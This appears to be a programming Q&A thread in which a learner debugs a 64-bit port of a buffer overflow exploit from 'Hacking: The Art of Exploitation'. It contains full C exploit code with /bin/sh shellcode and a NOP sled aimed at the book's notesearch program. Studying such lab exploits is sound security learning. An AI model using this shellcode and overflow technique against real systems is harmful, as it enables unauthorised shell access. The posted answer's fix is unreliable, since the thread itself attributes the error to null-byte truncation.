# Buffer Overflow Exploit : sh: 1: Syntax error: Unterminated quoted string : Developing exploit for personal enrichment

Tags: c, memory-management, stack, stack-overflow, buffer-overflow

So recently, I've been reading the book Hacking: The Art of Exploitation by Jon Erickson in order to work on my software security skills. This book is starting to get a little bit outdated though, and gives code examples meant to run on it's own 32 bit virtual environment rather than a dedicated 64 bit machine. What I've been trying to do however is to reimplement the exploits this book  offers in a Ubuntu Xenial 16.04 distro as a means of really ensuring I'm confident with the material.

I've ran into an issue however at the book's first "exploitation" exercise, and was hoping that someone could help me figure out what I'm doing wrong. What I'm trying to do in this code is to exploit a buffer overflow vulnerability in the program ./notesearch (https://github.com/intere/hacking/blob/master/booksrc/notesearch.c). Here is my code for exploit_notesearch.c:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int COMMAND_SIZE = 200;
char shellcode[] =
  "\x32\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
  "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
  "\xe1\xcd\x80";

int main(int argc, char *argv[]) {
  unsigned int i, *ptr, offset=270;
  int *int_ptr = &i;
  long ret;
  char *command, *buffer;

  command = (char *) malloc(COMMAND_SIZE); // Allocates memory for command                                                                                                             
  bzero(command, COMMAND_SIZE); // Zero out the memory                                                                                                                                 

  strcpy(command, "./notesearch \'"); // Start command buffer.                                                                                                                         
  buffer = command + strlen(command); // Set buffer at the end.                                                                                                                        

  if(argc > 1) // Set ioffset.                                                                                                                                                           
      offset = atoi(argv[1]);
  ret = (long) &i - offset;

  int alignment_adjust = sizeof(char*) - strlen(command) % sizeof(char*); // Pads first part of command with NOP instructions                                                          
  memset(buffer, 0x90, alignment_adjust);
  buffer += alignment_adjust;

  int remaining_buffer_size = COMMAND_SIZE - ((long) buffer - (long) command); // Floods buffer with return address                                                                    
  for(i = 0; i < remaining_buffer_size - sizeof(long *); i += sizeof(long *))
    *((long *) (buffer + i)) = ret;

  memset(buffer, 0x90, 64); // Creates NOP sled                                                                                                                                        

  memcpy(buffer+64, shellcode, sizeof(shellcode)-1); // Copies shellcode 
into buffer                                                                                                   
  int shellcode_adjust = sizeof(char*) - strlen(shellcode) % 
sizeof(char*); // Pads shellcode with NOP instructions                                                                    
  memset(buffer+64+strlen(shellcode), 0x90, shellcode_adjust);

  memset(command + COMMAND_SIZE - ((COMMAND_SIZE - 1) % sizeof(long *)) - 1, 0x27, 1); // Terminates sh string with quote character (0x27)                                             
  system(command); // Executes command                                                                                                                                                 
}
```

Broken down step by step:

1. First I preface the payload with the command I'm executing, and open an input string with a single quote
2. Second, I fill the buffer with a return address calculated by subtracting an offset value from the variable i in exploit_notesearch
3. After this, I create a NOP sled for the first 64 bites after the command executing the program, followed by a block of shellcode.
4. After filling in all the blank spots, I terminate the command with a final " ' " character. This is to close the string I opened in step 1.

What I am hoping happens on execution is (from what I know) pretty standard of a stack based buffer overflow exploit using a NOP sled. After going past the buffer's limit in memory, the contents of the input string overwrite the return address of the instruction pointer which has previously been pushed upon creation of the stack frame. Although this might not work at first, running the program with various offset variables should help us to single down on the correct alignment for the execution. Since we now control the return address of the program, we are able to redirect the execution flow to a sled of NOP instructions on the stack until we eventually run into a block of shellcode. I have based the design of this program off of the principles outlined in the original exploit_notesearch.c, but have adapted it to take account of pointers of different sizes, and to be more obvious regarding it's function (https://github.com/intere/hacking/blob/master/booksrc/exploit_notesearch.c) . When executing this program however, I am greeted with the following error:

> sh: 1: Syntax error: Unterminated quoted string

After reading this, I got the impression that the single quoted string in the command variable was not terminated properly, but after inspecting it with GDB, it looks like the string ends with a single quote no matter what the COMMAND_SIZE is set to. I have also considered that a 0x27 may have been a component of one of the memory addresses used as a guess regarding the location of the NOP sled, but after trying many different offsets, I am still greeted with the same error. Additionally, I have taken steps to compile notesearch without stack protection on, and have disabled ASLR to simplify the process for educational purposes.

I feel like I'm making a silly error and forgetting a single quote somewhere, but I think after looking at the memory, is is pretty clear that I am including a single quote. Especially since I thought so much about the program logic to always fasten it right after the termination of the memory addresses.

If someone could take a look at my code and get back to me that would be lovely. I'm going to keep looking at it, but so far the answer hasn't been obvious to me, and I think it might take a more trained eye to pick it out. Thanks!

Comment: Have you tried the example in the original 32 bit architecture.  Did it work?  Many books have incorrect code.  The error message at least shows you have called a shell.... so you probably are in the good way.  this seems a class assignment to me, so I'm not going to give you a solution for it.  You have to do de real workings yourself.

Comment: It did work in the 32 bit shell, but I didn’t think this was productive since it would just teach me how to copy code rather than understand the principles behind it. This is not a class assignment; I’m reading the book Hacking: The Art of Exploitation by Jon Erickson because the topic interests me. I don’t know if I’m actually calling shell with the shellcode however. I think it’s an error with the quoting in the command the program generates for the system call, but my next step is to run some tests to verify this is the case.

Comment: check the ABI conventions, as the number of general purpose registers and stack frame preallocations can be a source of differences in your case.  Anyway, copying code can be dumb or very interesting to show how problem details got solved the first time.  My proposals only give more work for you to do.  I'm sorry about that, but it should show the actual problem up.

Comment: I think what's happening is that since the memory addresses are occupying a larger address space, there are leading 0s for some of the addresses I store on the buffer which are being interpreted as the end of the buffer by the system() call. For example, the address 0x00007fffffffe34e when stored in a string does not get parsed by the system() call since it terminates at the 0x00. I tested this by outputting the true contents of the buffer to a .sh file, and running it. It worked fine, so this implying that the string was indeed terminating early. This also makes sense with the error given.

Comment: Except I'm not sure how to fix it. I doubt there would be a way to ignore null terminator characters since the system call does need to know where to end. Perhaps someone knows of a way you can end the command after a certain number of characters?

Answer (score 0):

The problem is that you are missing the `'` last quotation mark at the end of command.
The problem should be fixed by adding this line of code before executing the command. 
`strcat(command, "\'");`